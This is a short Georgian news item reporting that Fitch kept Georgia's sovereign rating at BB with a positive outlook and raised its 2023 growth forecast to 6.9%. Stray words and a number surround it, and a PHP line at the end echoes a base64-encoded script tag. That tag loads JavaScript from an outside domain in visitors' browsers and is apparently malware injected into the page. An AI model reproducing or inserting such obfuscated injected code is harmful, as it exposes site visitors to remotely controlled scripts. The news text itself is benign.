celsiusi
ავერსი შნაიდერი

საერთაშორისო სარეიტინგო სააგენტო Fitch-მა საქართველოს სუვერენული საკრედიტო რეიტინგის შესახებ ახალი შეფასება გამოაქვეყნა.

როგორც ანგარიშშია აღნიშნული, სააგენტომ რეიტინგი უცვლელად, BB დონეზე შეინარჩუნა.

Fitch-ის მონაცემებით, უცვლელია ქვეყნის საკრედიტო რეიტინგის პერსპექტივა და ის კვლავ პოზიტიურია.

Firch-ის ანგარიშში ყურადღება გამახვილებულია ისეთ ფაქტორებზე, რომლებიც ხელს უწყობს პოზიტიური პერსპექტივის შენარჩუნებას. საუბარია მნიშვნელოვნად მაღალ ეკონომიკურ ზრდაზე, ინფლაციის შემცირებაზე, საგარეო პოზიციის გაუმჯობესებასა და ჯანსაღი და გონივრული მაკროეკონომიკური პოლიტიკის განგრძობადობაზე.

ამასთან, ორგანიზაცია 2023 წლის განმავლობაში ქვეყანაში 6.9%-იან ეკონომიკურ ზრდას პროგნოზირებს, რაც იანვარში გამოქვეყნებულ 4.5%-იან პროგნოზთან შედარებით 2.4 პროცენტული პუნქტით მეტია.

368
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");